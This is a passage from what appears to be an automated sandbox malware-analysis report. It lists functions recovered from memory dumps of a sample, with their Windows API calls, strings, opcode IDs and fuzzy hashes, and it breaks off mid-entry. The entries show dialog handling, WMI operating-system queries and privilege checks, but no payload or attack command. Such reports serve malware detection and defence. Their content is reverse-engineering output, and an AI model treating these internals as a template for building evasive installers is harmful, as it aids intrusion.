                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e8c956938e007aff3052442c785adf6fd381610c572edc40bc979a8e284e6881
                                                                                                                    • Instruction ID: 74acf2d1850049e1b19e3e940fe69bf3308bb793572ff208650278bfed671fef
                                                                                                                    • Opcode Fuzzy Hash: e8c956938e007aff3052442c785adf6fd381610c572edc40bc979a8e284e6881
                                                                                                                    • Instruction Fuzzy Hash: 9951E0B1A087159FC748CF19D88055AFBE1FF88314F058A2EE899E3341D734E959CB96
                                                                                                                    Function 00593E0B Relevance: .1, Instructions: 112COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                    • Instruction ID: 28446882b78ce3e1237d24c35222c5b33d75f51a4589741faacaff77968f002b
                                                                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                    • Instruction Fuzzy Hash: CD31D5B1A147478FCB14EF28C85516ABFE0FB95304F14492DE895D7341C739EA0ACB92
                                                                                                                    Function 0058E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 0058E30E
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                      • Part of subcall function 00591DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,005C1030,00000200,0058D928,00000000,?,00000050,005C1030), ref: 00591DC4
                                                                                                                    • _strlen.LIBCMT ref: 0058E32F
                                                                                                                    • SetDlgItemTextW.USER32(?,005BE274,?), ref: 0058E38F
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0058E3C9
                                                                                                                    • GetClientRect.USER32(?,?), ref: 0058E3D5
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0058E475
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0058E4A2
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0058E4DB
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0058E4E3
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0058E4EE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0058E51B
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0058E58D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                    • String ID: $%s:$CAPTION$d$t[
                                                                                                                    • API String ID: 2407758923-850499219
                                                                                                                    • Opcode ID: 6abe2d40717c09a6e2b0a873b0575d968ac0e37ce83dcf6ce73787d9db0822ec
                                                                                                                    • Instruction ID: 4b809cbf4e3334179c47a697aea7e2a60a229eabb5b46db9387acb25edd727b4
                                                                                                                    • Opcode Fuzzy Hash: 6abe2d40717c09a6e2b0a873b0575d968ac0e37ce83dcf6ce73787d9db0822ec
                                                                                                                    • Instruction Fuzzy Hash: 5C818E71608341AFD714EFA8CD89A6FBBF9FBC9704F04091DFA85A7250D630E9098B52
                                                                                                                    Function 005ACB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 005ACB66
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC71E
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC730
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC742
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC754
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC766
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC778
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC78A
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC79C
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC7AE
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC7C0
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC7D2
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC7E4
                                                                                                                      • Part of subcall function 005AC701: _free.LIBCMT ref: 005AC7F6
                                                                                                                    • _free.LIBCMT ref: 005ACB5B
                                                                                                                      • Part of subcall function 005A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?), ref: 005A8DE2
                                                                                                                      • Part of subcall function 005A8DCC: GetLastError.KERNEL32(?,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?,?), ref: 005A8DF4
                                                                                                                    • _free.LIBCMT ref: 005ACB7D
                                                                                                                    • _free.LIBCMT ref: 005ACB92
                                                                                                                    • _free.LIBCMT ref: 005ACB9D
                                                                                                                    • _free.LIBCMT ref: 005ACBBF
                                                                                                                    • _free.LIBCMT ref: 005ACBD2
                                                                                                                    • _free.LIBCMT ref: 005ACBE0
                                                                                                                    • _free.LIBCMT ref: 005ACBEB
                                                                                                                    • _free.LIBCMT ref: 005ACC23
                                                                                                                    • _free.LIBCMT ref: 005ACC2A
                                                                                                                    • _free.LIBCMT ref: 005ACC47
                                                                                                                    • _free.LIBCMT ref: 005ACC5F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                    • String ID: h[
                                                                                                                    • API String ID: 161543041-2192341851
                                                                                                                    • Opcode ID: 83531cdc62895a27b4f281a871b5951c606133357c83aafd8911424ec48b0ad5
                                                                                                                    • Instruction ID: 7e3842b8acfc5bc72f9a371645524210683071a79dbf67190fa734ab8c5062c1
                                                                                                                    • Opcode Fuzzy Hash: 83531cdc62895a27b4f281a871b5951c606133357c83aafd8911424ec48b0ad5
                                                                                                                    • Instruction Fuzzy Hash: F431327160030A9FEB21AA39D94AB6EBFE9FF52320F545419E559D7291DF31EC40CB20
                                                                                                                    Function 005A96F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 005A9705
                                                                                                                      • Part of subcall function 005A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?), ref: 005A8DE2
                                                                                                                      • Part of subcall function 005A8DCC: GetLastError.KERNEL32(?,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?,?), ref: 005A8DF4
                                                                                                                    • _free.LIBCMT ref: 005A9711
                                                                                                                    • _free.LIBCMT ref: 005A971C
                                                                                                                    • _free.LIBCMT ref: 005A9727
                                                                                                                    • _free.LIBCMT ref: 005A9732
                                                                                                                    • _free.LIBCMT ref: 005A973D
                                                                                                                    • _free.LIBCMT ref: 005A9748
                                                                                                                    • _free.LIBCMT ref: 005A9753
                                                                                                                    • _free.LIBCMT ref: 005A975E
                                                                                                                    • _free.LIBCMT ref: 005A976C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID: 0d[
                                                                                                                    • API String ID: 776569668-637672029
                                                                                                                    • Opcode ID: 6aa77befda5938f46667e84a9de3da54fce89ec35930e9270ed3f898bcde1c2d
                                                                                                                    • Instruction ID: 9ac18f89da057c132633af9f1a76a51f4541b0b62f8335fcfa808f2e3a3ff46c
                                                                                                                    • Opcode Fuzzy Hash: 6aa77befda5938f46667e84a9de3da54fce89ec35930e9270ed3f898bcde1c2d
                                                                                                                    • Instruction Fuzzy Hash: A111A4B651010AAFCB01EF64C886CED3FB5FF59350B5154A1FA088F262DE32EA509B84
                                                                                                                    Function 00599711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00599736
                                                                                                                    • _wcslen.LIBCMT ref: 005997D6
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 005997E5
                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00599806
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0059982D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                    • String ID: FjunY$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                    • API String ID: 1777411235-1435320249
                                                                                                                    • Opcode ID: 763c73727c04a629b98975d724dbaa5d8631f50f6f446076b1ca347f38bdc3a8
                                                                                                                    • Instruction ID: 105bb8148c8825926d10c2780463262ab4e1d41abbc30290cc8d54b947f590e6
                                                                                                                    • Opcode Fuzzy Hash: 763c73727c04a629b98975d724dbaa5d8631f50f6f446076b1ca347f38bdc3a8
                                                                                                                    • Instruction Fuzzy Hash: 893127325087127ADB35AF689C4AFAF7F9CFF97310F14011DF501961D2EB64AA0883A6
                                                                                                                    Function 0059D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0059D6C1
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0059D6ED
                                                                                                                      • Part of subcall function 00591FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0058C116,00000000,.exe,?,?,00000800,?,?,?,00598E3C), ref: 00591FD1
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0059D709
                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0059D720
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0059D734
                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0059D75D
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0059D764
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0059D76D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                    • String ID: STATIC
                                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                                    • Opcode ID: b9e465b8609ebb2d72c5143b5f27b2d7294500c4e8f35ec149012a29bd981f9c
                                                                                                                    • Instruction ID: 35251bf5f55a029e3c631edfbae6ab01bc529ad01842920aeaaca1105078083b
                                                                                                                    • Opcode Fuzzy Hash: b9e465b8609ebb2d72c5143b5f27b2d7294500c4e8f35ec149012a29bd981f9c
                                                                                                                    • Instruction Fuzzy Hash: D011E7725403617BEB216BB09C8EFAF7E6CFB54751F014120FA81A6091DB648F0956B5
                                                                                                                    Function 005A2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                    • String ID: csm$csm$csm
                                                                                                                    • API String ID: 322700389-393685449
                                                                                                                    • Opcode ID: c02deca1c05cb54f278a31a21d2cac545b3447b2834eec36782edcc50fde0364
                                                                                                                    • Instruction ID: ac71200632187a719d2b3aa18266154f957ef19f8a382f251bc4a14d36078c21
                                                                                                                    • Opcode Fuzzy Hash: c02deca1c05cb54f278a31a21d2cac545b3447b2834eec36782edcc50fde0364
                                                                                                                    • Instruction Fuzzy Hash: 97B18A7180020AEFCF29DFA8C88A9AEBFB5FF46314F14455AF8016B212D771DA51CB91
                                                                                                                    Function 0058AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nY
                                                                                                                    • API String ID: 3519838083-3775052962
                                                                                                                    • Opcode ID: 9976e39adb175fb1b68c27398893e75d3a459b67511924ca2a4d9ec82ee447c3
                                                                                                                    • Instruction ID: 46288c151d5907c58a31ef8cff62197f2dc06c7db84c1901c902849cf26bae5f
                                                                                                                    • Opcode Fuzzy Hash: 9976e39adb175fb1b68c27398893e75d3a459b67511924ca2a4d9ec82ee447c3
                                                                                                                    • Instruction Fuzzy Hash: 18715D75A00219EFEB14EF64CC999AEBBB9FF48310B14065DF916B72A0CB306E05DB50
                                                                                                                    Function 00586FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00586FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00587013
                                                                                                                    • _wcslen.LIBCMT ref: 00587084
                                                                                                                      • Part of subcall function 00587A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00587AAB
                                                                                                                      • Part of subcall function 00587A9C: GetLastError.KERNEL32 ref: 00587AF1
                                                                                                                      • Part of subcall function 00587A9C: CloseHandle.KERNEL32(?), ref: 00587B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                                    • Opcode ID: 930854f63f9476360380635e4446255f276f43680dfcbb51410f617429651fa4
                                                                                                                    • Instruction ID: 90182f24cee6beb62bc251aa03d1aa11490c5f76fb78c1447c3d030209a9def1
                                                                                                                    • Opcode Fuzzy Hash: 930854f63f9476360380635e4446255f276f43680dfcbb51410f617429651fa4
                                                                                                                    • Instruction Fuzzy Hash: 4041E6B1D08749AAEB20F7709C8EFEE7F6CBF49304F100455FD55B6182DA70AA488721
                                                                                                                    Function 0059B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00581316: GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                      • Part of subcall function 00581316: SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0059B610
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0059B637
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0059B650
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0059B661
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0059B66A
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0059B67E
                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0059B694
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                    • String ID: LICENSEDLG
                                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                                    • Opcode ID: 6e2ab5f65429fa41417be789163385c749e3d3b68150248c7f310cd3c50a46c0
                                                                                                                    • Instruction ID: 948eb57dc26500714025432533d8ae52e183e2e6f20aa48c12e036ad0250369d
                                                                                                                    • Opcode Fuzzy Hash: 6e2ab5f65429fa41417be789163385c749e3d3b68150248c7f310cd3c50a46c0
                                                                                                                    • Instruction Fuzzy Hash: 3A21E431204215BBFB255B66FE8DF3B3F6CFB96741F010019F641AA0A0DB52AA05E631
                                                                                                                    Function 0059FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,AC446398,00000001,00000000,00000000,?,?,0058AF6C,ROOT\CIMV2), ref: 0059FD99
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0058AF6C,ROOT\CIMV2), ref: 0059FE14
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0059FE1F
                                                                                                                    • _com_issue_error.COMSUPP ref: 0059FE48
                                                                                                                    • _com_issue_error.COMSUPP ref: 0059FE52
                                                                                                                    • GetLastError.KERNEL32(80070057,AC446398,00000001,00000000,00000000,?,?,0058AF6C,ROOT\CIMV2), ref: 0059FE57
                                                                                                                    • _com_issue_error.COMSUPP ref: 0059FE6A
                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,0058AF6C,ROOT\CIMV2), ref: 0059FE80
                                                                                                                    • _com_issue_error.COMSUPP ref: 0059FE93
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
